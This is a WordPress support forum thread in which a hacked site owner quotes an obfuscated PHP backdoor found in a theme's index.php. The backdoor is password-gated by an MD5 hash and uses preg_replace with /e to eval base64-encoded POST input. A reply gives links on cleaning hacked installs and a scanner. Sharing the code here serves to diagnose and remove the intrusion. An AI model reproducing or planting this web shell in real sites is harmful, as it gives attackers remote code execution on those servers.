Backdoor in Themes/index.php | ww.wp.xz.cn

icey7
(@icey7)

14 years, 4 months ago

Hi

I have been hacked twice over the past three days.

After searching all wp files, I came across this inside the themes/index.php file.

<?php
// Silence is golden.
if(@md5($_POST[‘u’.’pw’])==’cfa77535e609eb6b45350ab7913de211′)
preg_replace(“|w|e”,’ev’.’al(ba’.’se64′.’_dec’.’ode($_’.’PO’.’ST[“c”]));’,”w”);
?>

Any ideas how this code got there or how to prevent it from getting there again ?

Thankyou
Kind Regards

Viewing 2 replies - 1 through 2 (of 2 total)

esmi
(@esmi)

14 years, 4 months ago

http://codex.ww.wp.xz.cn/FAQ_My_site_was_hacked
http://ww.wp.xz.cn/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

http://sitecheck.sucuri.net/scanner/

Thread Starter icey7
(@icey7)

14 years, 4 months ago

Thanks I will check those out

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Backdoor in Themes/index.php’ is closed to new replies.

Tags

In: Fixing WordPress
2 replies
2 participants
Last reply from: icey7
Last activity: 14 years, 4 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics